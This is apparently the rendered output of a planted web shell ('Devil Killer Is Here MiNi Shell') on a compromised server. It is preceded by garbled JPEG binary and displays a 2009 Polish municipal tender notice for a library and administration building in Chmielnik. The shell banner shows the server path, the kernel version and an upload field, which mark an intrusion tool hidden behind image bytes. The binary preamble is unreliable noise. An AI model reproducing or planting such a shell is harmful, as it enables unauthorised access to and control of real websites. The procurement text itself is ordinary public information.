JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090922/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090922/326810-N-2009.html

<p class="kh_header"><b>Chmielnik: Budowa budynku biblioteczno-administracyjnego w Chmielniku
wraz z infrastrukturą towarzyszącą i zagospodarowaniem terenu</b><br>
<b>Numer ogłoszenia: 326810 - 2009; data zamieszczenia: 22.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chmielnik , Plac Kościelny 5, 26-020 Chmielnik, woj. świętokrzyskie, tel. 041 3543273, faks 041 3543273.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa budynku biblioteczno-administracyjnego w Chmielniku
wraz z infrastrukturą towarzyszącą i zagospodarowaniem terenu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Budowa budynku biblioteczno-administracyjnego w Chmielniku wraz z infrastrukturą towarzyszącą i zagospodarowaniem terenu.
Miejsce prowadzenia robót: Chmielnik, działki o nr ewidencyjnym 1123 i 1124/1, położone pomiędzy ul. Szydłowską a ul. Wspólną.

Obiekt nr 1  - budynek biblioteczno-administracyjny
- powierzchnia zabudowy budynku 		-      908 m2
- powierzchnia użytkowa 			-    2193 m2
- kubatura budynku			- 11 340 m2
- budynek piętrowy, z pełnym podpiwniczeniem  (PODPIWNICZENIE WYKONANE/POZA PRZEDMIOTEM ZAMÓWIENIA), z częściowym poddaszem użytkowym
- średnia wysokość od poziomu terenu do góry gzymsu budynku od Placu Kościuszki - 8,92 m,            od ul. Wspólnej - 7,26 m
- maksymalna wysokość od poziomu terenu do kalenicy budynku  - 12,88 m
- budynek planowany do budowy w kształcie litery C, o maksymalnych wymiarach: 
szerokości 23,57m i długości 51,01m
Budynek murowany z cegły, ściany nadziemia jednowarstwowe i wielowarstwowe z cegły ceramicznej pełnej, ściany zewnętrzne warstwowe gr. 48cm (cegła 12cm+styropian 11cm + warstwa nośna 25cm), ścianki działowe gr. 12 cm z cegły dziurawki lub kratówki, gr. 6,5cm z dziurawki. Słupy żelbetowe.
Podciągi i żebra żelbetowe wylewane na mokro. Część podciągów na parterze stalowe z profili dwuteowych.  
Stropy z płyt FILIGRAN PSJ gr. 24cm, w szybie windowym żelbetowe płyty wylewane na mokro, nad pomieszczeniami poddasza stropy gęsto żebrowe typu TERIVA gr. 24.
Część nadproży żelbetowe wylewane, pozostałe z prefabrykowanych belek żelbetowych L19.
Schody wewnętrzne trójbiegowe żelbetowe wylewane na mokro, płytowe.
Kominy z przewodami wentylacji grawitacyjnej z cegły pełnej, ponad połaciami dachowymi 
z klinkierowej cegły ceramicznej. 
Konstrukcja dachu nad wszystkimi częściami budynku drewniana. Pokrycie dachowe - stalowa blacha powlekana płaska (kolor matowy grafit) z przegięciami typu CLASIC na łatach i kontrłatach oraz folii paroprzepuszczalnej. Wszystkie obróbki, rynny i rury spustowe  systemu CLASIC z blachy powlekanej matowej.
Tynki wewnętrzne na ścianach i sufitach cementowo-wapienne kat. IV. Na skosach dachowych poddasza z płyt gipsowo-kartonowych. Na ścianach sanitariatów ich przedsionków, pomieszczeń  porządkowych, pomieszczeń socjalnych, aneksów kuchennych do wysokości min. 200 cm nad posadzką okładzina z płytek glazurowych. 
W niektórych pomieszczeniach na wysokości 260 cm od posadzki sufit podwieszany maskujący przebieg instalacji z elementów gipsowych.
Stolarka okienna drewniana, jednoramowa, z okuciami obwiedniowymi, szklona podwójnie termoizolacyjnymi pakietami ze szkła przezroczystego.
Stolarka drzwiowa typowa, w kolorze naturalnej dębiny leśnej.
Ślusarka aluminiowa (zastępująca często ścianki działowe) - atestowane dymoszczelne przegrody 
o wymaganej przeciwpożarowej odporności ogniowej EI30 i EI60.
Balustrady w budynku ze stali nierdzewnej wys. min. 110cm.
Do malowania pomieszczeń ekologiczne farby emulsyjne, emulsyjno-akrylowe.
Na ścianach budynku tynk cem.-wap. kat. III a na nim strukturalny tynk akrylowy śr. do 2mm.
Wszystkie schody zewnętrzne betonowe, wylewane na mokro z płytą gr. 12cm zbrojoną siatką stalową. Stopnice przeciwpoślizgowe granitowe z płomieniowanych płyt gr. 5cm, posadzka na pochylni oraz na spoczniku schodów wejścia głównego również z płyt granitowych gr. 3cm.
Dla osób niepełnosprawnych winda hydrauliczna, posiadająca samonośny, aluminiowy i przeszklony szyb o maksymalnych wymiarach zewnętrznych 157x157cm oraz platforma dla niepełnosprawnych.
Instalacje wewnętrzne w budynku: instalacja wody zimnej, instalacja wewnętrznych hydrantów przeciwpożarowych, instalacja ciepłej wody, instalacja kanalizacji sanitarnej, instalacja wentylacji mechanicznej, instalacja c.o., instalacja gazowa, instalacja elektryczna siłowa, instalacja elektryczna oświetlenia ogólnego i gniazd wtykowych, instalacje sygnalizacyjne, instalacje komputerowe, instalacje zerowania i przeciwprzepięciowe.

Obiekt nr 2  - zadaszenie pojemników na śmieci
- powierzchnia zabudowy			- 9,4 m2
- powierzchnia użytkowa			- 7,1 m2
- kubatura				- 26 m3
Ogrodzenie działki
Ogrodzenie od ul. Wspólnej z prętów stalowych, z cokołami i filarkami murowanymi z cegły, tynkowanymi tynkiem żywicznym (w tym brama i furtka) o dł. 14,26mb.
Ogrodzenie od strony działki Pana Lewickiego i od strony wschodniej mur ogrodzeniowy (dł. 40mb).
Murki oporowe zjazdu do garażu oraz murki terenowe
Łączna długość projektowanych na działkach murków oporowych oraz terenowych wynosi 36 mb.
Średnia wysokość murków zróżnicowana w zależności od usytuowania od 40 cm do prawie 300 cm.
Murki oporowe żelbetowe oraz murki terenowe betonowe. Tynkowane tynkiem żywicznym.
Uzbrojenie terenu 
Podłączenie budynku do sieci wodociągowej w ul. Wspólnej.
Kanalizacja sanitarna z przepompownią na działce i podłączenie do sieci kanalizacji sanitarnej w ul. Wspólnej.
Drogi i chodniki
Zjazd do garażu z kostki granitowej 10x10 cm	- 51 m2
Drogi i parkingi z kostki brukowej betonowej na podbudowie tłuczniowo-piaskowej w kolorze szarym gr. 8cm 	- 211 m2
Chodniki i opaska z betonowej kostki brukowej z antypoślizgową posypką żwirową, gr. 8cm - 103m2
Krawężniki drogowe granitowe, obrzeża chodnikowe z betonowych obrzeży chodnikowych. 

Szczegółowy zakres przedmiotu zamówienia zawiera dokumentacja projektowa, w tym projekt budowlano-wykonawczy oraz specyfikacja techniczna wykonania i odbioru robót. 
Załączone do specyfikacji przedmiary robót nie są elementem dokumentacji projektowej, lecz stanowią materiał pomocniczy na użytek: 
- określenia minimalnych norm technicznych, jakości i materiałów,
- wyspecyfikowania minimalnego zakresu robót, 
- oceny, czy nie zachodzi przypadek rażąco niskiej ceny.
Przedmiot zamówienia musi być wykonany przy zachowaniu minimalnych parametrów technicznych 
i norm określonych w dokumentacji projektowej.
Zaleca się aby Wykonawca dokonał wizji lokalnej terenu budowy i jego otoczenia, wraz z dokonaniem stosownych pomiarów i oględzin miejsca prowadzenia robót a także zdobył, na swoją własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej terenu budowy poniesie Wykonawca.
Wymagany okres gwarancji jakości  - minimum  36 miesięcy, liczony od daty zakończenia czynności  odbioru końcowego robót.

UWAGA
Materiały i wyroby użyte do wykonania przedmiotu zamówienia winny spełniać wymogi określone w:
- Ustawie - prawo budowlane /Dz.U. z 2006r nr 156 poz. 1118/
- Ustawie z dnia 16.04.2004r. o wyrobach budowlanych /Dz.U. z 2004r nr 92 poz.881/
- Rozporządzeniu Ministra Infrastruktury z dnia 11.08.2004r. w sprawie systemów oceny zgodności, wymagań, jakie powinny spełniać notyfikowane jednostki uczestniczące w ocenie zgodności, oraz sposobu oznaczania wyrobów budowlanych oznakowaniem CE.

W ofercie należy przewidzieć ceny osprzętu i materiałów wykończeniowych, instalacyjno budowlanych wysokiej jakości, które umożliwią  Zamawiającemu szeroki ich wybór przed zakupem materiałów. Dobór kolorystyczny osprzętu i materiałów wykończeniowych wymaga wyprzedzających uzgodnień z nadzorem autorskim i Zamawiającym. 
ZAMAWIAJĄCY DOPUSZCZA ZASTOSOWANIE MATERIAŁÓW, PRODUKTÓW I WYROBÓW RÓWNOWAŻNYCH/PORÓWNOWALNYCH/O NIE GORSZYCH PARAMETRACH Z TYMI, KTÓRYCH ZASTOSOWANIE PROJEKTANT PRZEWIDZIAŁ W PROJEKCIE BUDOWLANYM PO WCZEŚNIEJSZYM UZGODNIENIU Z INWESTOREM

 Wykonawca zobowiązany jest w ramach zamówienia:
a) przed rozpoczęciem robót do uzgodnienia harmonogramu robót  z Zamawiającym;
b) uzyskać zgodę na czasowe zajęcie pasów drogowych; koszty zajęcia  pasa drogowego i wbudowania urządzeń w pas drogowy należy uwzględnić w wynagrodzeniu  ryczałtowym.
c) zapewnić bezpieczną organizację ruchu kołowego i pieszego wraz z czytelnym 
i widocznym  oznakowaniem;
d) zapewnić bezpieczeństwo osób przebywających w terenie oraz ochronę mienia;
e) prowadzić roboty zgodnie z przepisami bhp i p.poż. oraz utrzymać plac budowy 
w należytym  porządku;
f) zorganizować we własnym zakresie czasowy plac składowy urobku powstałego podczas  wykonywania robót;
g) przeprowadzić rozruchy technologiczne z udziałem przedstawicieli posiadających odpowiednie autoryzacje producentów,  rozruchy technologiczne muszą być  potwierdzone protokółami;  
h) przekazać dokumentację odbiorową w dwóch egzemplarzach;
i) przekazać na dzień odbioru końcowego instrukcję bezpiecznej eksploatacji obiektu;
j) przekazać na dzień odbioru końcowego instrukcję obsługi systemów instalacyjnych np.:  elektrycznych, teletechnicznych, wentylacji mechanicznej, klimatyzacji, przeciwpożarowej itp.
k) przeszkolić pracowników  użytkowników w zakresie obsługi w/w systemów instalacyjnych;
l) zapewnić kompleksową obsługę geodezyjną niezbędną przy realizacji zamówienia wraz z operatem geodezyjnym powykonawczym; na odbiór końcowy Wykonawca przygotuje geodezyjną inwentaryzację powykonawczą  zarejestrowaną w Ośrodku Dokumentacji Geodezyjno - Kartograficznej w 2 kompletach  zbiorczych; powyższe mapy Wykonawca przekaże zamawiającemu w dniu zgłoszenia do odbioru końcowego;
m) zanieczyszczoną ziemię, odpady budowlane, gruz i śmieci należy wywieźć na legalne wysypisko. Koszty wywozu wraz z jego utylizacją należy uwzględnić w wynagrodzeniu;
n) Wykonawca we własnym zakresie:
-  zorganizuje czasowe zaplecze budowy na terenie przeznaczonym pod realizację zadania
- zamontuje tymczasowe urządzenia pomiarowe na dostawę wody i energii elektrycznej  dla potrzeb placu budowy wraz z uzyskaniem warunków technicznych od gestorów sieci;
o) złożenia, w imieniu Zamawiającego, prawidłowego wniosku o wydanie pozwolenia na użytkowanie (wymagane w art. 56 i art. 57 Prawa Budowlanego) wraz z niezbędnymi dokumentami;
p) po stronie Wykonawcy leży zorganizowanie odbiorów technicznych przez odpowiednie instytucje (straż, P.I.P, sanepid) oraz poniesienie kosztów tych odbiorów.
45215000-7.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.50.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda od wykonawców wniesienia wadium w wysokości 100 000 zł 
(słownie:  sto tysięcy 00/100). 
Wadium Wykonawca składa w jednej lub kilku formach wymienionych w art. 45 ust. 6 Prawa zamówień publicznych.
Wadium składane w pieniądzu należy wpłacać na rachunek Zamawiającego w BS Chmielnik 
nr 32 8483 0001 2001 0017 7441 0001 a dowód wniesienia wadium należy dołączyć do oferty. lub złożyć w pok. Nr 17 Urzędu Miasta i Gminy w Chmielniku, Plac Kościelny 5. Wadium wniesione w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
W przypadku wadium wnoszonego w formie niepieniężnej należy dołączyć do oferty lub złożyć w pok. Nr 17 Urzędu Miasta i Gminy w Chmielniku, Plac Kościelny 5.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się  wykonawcy, którzy spełniają warunki określone w art. 22 ustawy Pzp:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy  nakładają obowiązek posiadania takich uprawnień;
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia; w tym 
- wykonali w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), przynajmniej dwa zamówienia odpowiadające przedmiotowi zamówienia, przez co należy rozumieć  roboty budowlane polegające na wybudowaniu budynków użyteczności publicznej o powierzchni użytkowej minimum 2000m2 i wartości nie mniejszej niż 6 mln (brutto) każdy;
- dysponują (lub będą dysponować) osobami, które posiadają uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej oraz pełnili obowiązki kierownika budowy przy zamówieniu polegającym na wybudowaniu (co najmniej jednej budowy) budynku użyteczności publicznej o pow. użytkowej nie mniejszej niż 2000m2;
3)  znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, w tym:
- wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności;
- wykonawca posiada środki finansowe lub zdolność kredytową w wysokości minimum oferowanej ceny za wykonanie zamówienia (brutto);
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Z postępowania o udzielenie zamówienia ( na podst. art. 24 ust. 1) wyklucza się:
1) wykonawców, którzy wyrządzili szkodę, nie wykonując zamówienia lub wykonując je nienależycie, jeżeli szkoda ta została stwierdzona prawomocnym orzeczeniem sądu wydanym w okresie 3 lat przed wszczęciem postępowania;
2) wykonawców, w stosunku do których otwarto likwidację lub których upadłość ogłoszono; z wyjątkiem wykonawców, którzy po ogłoszeniu upadłości zawarli układ zatwierdzony prawomocnym postanowieniem sądu, jeżeli układ nie przewiduje zaspokojenia wierzycieli poprzez likwidację majątku upadłego;
3) wykonawców, którzy zalegają z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, z wyjątkiem przypadków gdy uzyskali oni przewidziane prawem zwolnienie, odroczenie, rozłożenie na raty zaległych płatności lub  wstrzymanie w całości wykonania decyzji właściwego organu;
4) osoby fizyczne, które prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
5) spółki jawne, których wspólnika prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
6) spółki partnerskie, których partnera lub członka zarządu prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
7) spółki komandytowe oraz spółki komandytowo-akcyjne, których komplementariusza prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o  udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
8) osoby prawne, których urzędującego członka organu zarządzającego prawomocnie skazano za przestępstwo popełnione w związku z postępowaniem o udzielenie zamówienia, przestępstwo przeciwko prawom osób wykonujących pracę zarobkową, przestępstwo przekupstwa, przestępstwo przeciwko obrotowi gospodarczemu lub inne przestępstwo popełnione w celu osiągnięcia korzyści majątkowych, a także za przestępstwo skarbowe lub przestępstwo udziału w zorganizowanej grupie albo związku mających na celu popełnienie przestępstwa lub przestępstwa skarbowego;
9) podmioty zbiorowe, wobec których sąd orzekł zakaz ubiegania się o zamówienia na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary;
10) wykonawców, którzy nie spełniają warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3 ustawy - PZP.

Z postępowania o udzielenie zamówienia wyklucza się również (na podst. art. 24 ust. 2) wykonawców, którzy:
- wykonywali bezpośrednio czynności związane z przygotowaniem prowadzonego postępowania lub posługiwali się w celu sporządzenia oferty osobami uczestniczącymi w dokonywaniu tych czynności, chyba że udział tych wykonawców w postępowaniu nie utrudni uczciwej konkurencji; 
- złożyli nieprawdziwe informacje mające wpływ na wynik prowadzonego postępowania;
- nie złożyli oświadczenia o spełnieniu warunków udziału w postępowaniu lub dokumentów potwierdzających spełnienie tych warunków lub złożone dokumenty zawierają błędy;
- nie wnieśli wadium w tym również na przedłużony okres związania ofertą lub nie zgodzili się na przedłużenie okresu związania ofertą.

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie wg formuły spełnia/nie spełnia na podstawie oświadczeń i dokumentów jakie mają dostarczyć wykonawcy w celu potwierdzenia spełnienia warunków udziału w postępowaniu.
Z treści załączonych dokumentów musi wynikać jednoznacznie, iż warunki Wykonawca spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na potwierdzenie spełnienia warunków udziału w postępowaniu wykonawcy mają dostarczyć wraz z ofertą następujące dokumenty:
	
1.oświadczenie o spełnieniu warunków udziału w postępowaniu;
2.aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (z przedstawionego dokumentu musi wynikać co jest przedmiotem prowadzonej działalności oraz kto ma prawo do świadczenia woli w imieniu wykonawcy);
3. aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału  Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie 
w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4. wykaz wykonanych robót budowlanych w okresie ostatnich pięciu lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie, odpowiadającym swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie 
(np. referencje, opinie, listy polecające, itp.);
5. wykaz osób którymi dysponuje lub będzie dysponował wykonawca i  które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia wraz z uprawnieniami budowlanymi oraz aktualnym na dzień składania ofert, zaświadczeniem o przynależności do właściwego oddziału Izby Inżynierów Budownictwa osoby przewidzianej na kierownika budowy; (ewentualnie pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli 
w wykazie wykonawca wskazał osoby, którymi będzie dysponował);
6. informacja z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy,  wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
7. polisa lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności;
8. dowód wniesienia wadium.
	
Wymagane powyżej dokumenty są składane w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez wykonawcę. W przypadku złożenia oferty wspólnej w/w dokumenty dotyczą wszystkich podmiotów występujących wspólnie..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.chmielnik.com.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy w Chmielniku
26-020 Chmielnik, Plac Kościelny 5.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.10.2009 godzina 10:00, miejsce: Siedziba Zamawiającego w Chmielniku
26-020 Chmielnik, Plac Kościelny 5, pok. Nr 3 (Sekretariat).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com